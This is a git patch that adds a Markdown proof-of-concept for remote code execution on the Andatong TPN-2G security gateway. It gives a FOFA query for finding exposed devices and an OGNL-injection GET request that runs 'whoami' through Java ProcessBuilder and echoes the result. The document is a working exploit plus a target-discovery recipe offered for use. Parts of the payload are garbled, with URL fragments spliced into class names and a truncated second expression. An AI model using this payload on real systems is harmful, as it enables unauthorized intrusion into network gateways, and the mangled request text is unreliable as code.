From 718101b3638e271a027046c2007aae502bf9d250 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 18 May 2024 19:40:45 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=AE=89=E8=BE=BE=E9=80=9ATPN-2G?=
 =?UTF-8?q?=E5=AE=89=E5=85=A8=E7=BD=91=E5=85=B3=E8=BF=9C=E7=A8=8B=E4=BB=A3?=
 =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 安达通TPN-2G安全网关远程代码执行.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)
 create mode 100644 安达通TPN-2G安全网关远程代码执行.md

diff --git a/安达通TPN-2G安全网关远程代码执行.md b/安达通TPN-2G安全网关远程代码执行.md
new file mode 100644
index 0000000..b170874
--- /dev/null
+++ b/安达通TPN-2G安全网关远程代码执行.md
@@ -0,0 +1,12 @@
+## 安达通TPN-2G安全网关远程代码执行
+
+## fofa
+```
+ title="TPN-2G" || title="SJW74"
+```
+
+## poc
+```
+GET /lan/admin_getLisence?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%http://20java.io.InputStreamReader(%23a),%23c%3dnew%http://20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23screen.println(%23d),%23screen.close()}%22%3Etest.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22test%22}).start().getInputStream(),%23b%3dnew%http://20java.io.InputStreamReader(%23a),%23c%3dnew%20java HTTP/1.1
+
+```